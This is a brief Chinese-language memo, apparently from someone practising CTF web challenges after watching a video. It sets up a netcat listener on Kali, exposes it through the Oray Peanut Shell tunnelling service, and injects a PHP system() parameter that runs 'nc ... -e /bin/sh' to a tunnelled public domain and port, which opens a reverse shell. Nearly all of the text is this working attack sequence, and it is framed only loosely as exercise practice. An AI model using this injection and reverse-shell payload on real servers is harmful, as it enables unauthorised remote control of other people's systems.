学自这个视频
内网kali端口监听
nc -lvvnp 54321
进行内网穿透,下载花生壳(免费的),需要注册才可以下载
https://www.oray.com/
点击映射数,会跳转到浏览器
点击新增映射
内网主机为kali的IP
分配了域名和端口
打开一个题目
传参?cmd=system("nc s546459d57.zicp.fun 23494 -e /bin/sh");
s546459d57.zicp.fun 23494为分配的域名和端口
反弹shell